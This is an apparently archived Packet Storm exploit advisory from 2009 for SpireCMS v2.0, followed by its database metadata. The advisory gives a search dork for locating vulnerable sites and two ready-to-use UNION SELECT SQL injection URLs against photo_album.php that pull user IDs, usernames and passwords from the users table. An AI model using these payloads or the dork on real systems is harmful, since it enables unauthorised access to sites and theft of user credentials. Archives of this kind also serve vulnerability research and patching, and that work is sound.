ID PACKETSTORM:83780
Type packetstorm
Reporter Cr3w-D
Modified 2009-12-14T00:00:00
Description
`
view source
print?
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] SpireCMS v2.0 SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.spiread.com/
[+] script : SpireCMS v2.0
[+] Download : http://www.spiread.com/demo/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"photo_album.php?alb_id="
**************************************************************************/
[ Vulnerable File ]
http://server/photo_album.php?alb_id=[N.A.S.T ]
[ Exploit ]
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users
[ GReets ]
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS
`
{"sourceHref": "https://packetstormsecurity.com/files/download/83780/spirecms-sql.txt", "sourceData": "` \nview source \nprint? \nALGERIAN HACKER \n**********************- NORTH-AFRICA SECURITY TEAM -*********************** \n \n[!] SpireCMS v2.0 SQL Injection Vulnerability \n[!] Author : Dr.0rYX and Cr3w-DZ \n[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de \n \n***************************************************************************/ \n \n[ Software Information ] \n \n[+] Vendor : http://www.spiread.com/ \n[+] script : SpireCMS v2.0 \n[+] Download : http://www.spiread.com/demo/ (sell script) \n[+] Vulnerability : php SQL injection \n[+] Dork :inurl:\"photo_album.php?alb_id=\" \n \n**************************************************************************/ \n[ Vulnerable File ] \n \nhttp://server/photo_album.php?alb_id=[N.A.S.T ] \n \n[ Exploit ] \n \nhttp://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users \n \nhttp://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users \n \n[ GReets ] \n \n[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS \n \n`\n", "edition": 1, "references": [], "modified": "2009-12-14T00:00:00", "hash": "a98e75528ecddbaca48d9eb92183f7745716e31c223edfa974e0ed7b671c8194", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/83780/SpireCMS-2.0-SQL-Injection.html", "description": "", "id": "PACKETSTORM:83780", "reporter": "Cr3w-D", "lastseen": "2016-11-03T10:22:29", "published": "2009-12-14T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:29"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "SpireCMS 2.0 SQL Injection", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "659c911ca5257229ae996a03b36aa356", "key": "href"}, {"hash": "30f2e376f42a4d84a36fab70b6608f6c", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "30f2e376f42a4d84a36fab70b6608f6c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4eaa3e743c0cef487d1da4cede3b5c51", "key": "reporter"}, {"hash": "40dd56d2b89840a8d1bf795b6adede29", "key": "sourceData"}, {"hash": "7132d9df00c45d79c0cad5f88e77d6e5", "key": "sourceHref"}, {"hash": "2abd9e2fbfe8b26bd1bb42ea3536e65c", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
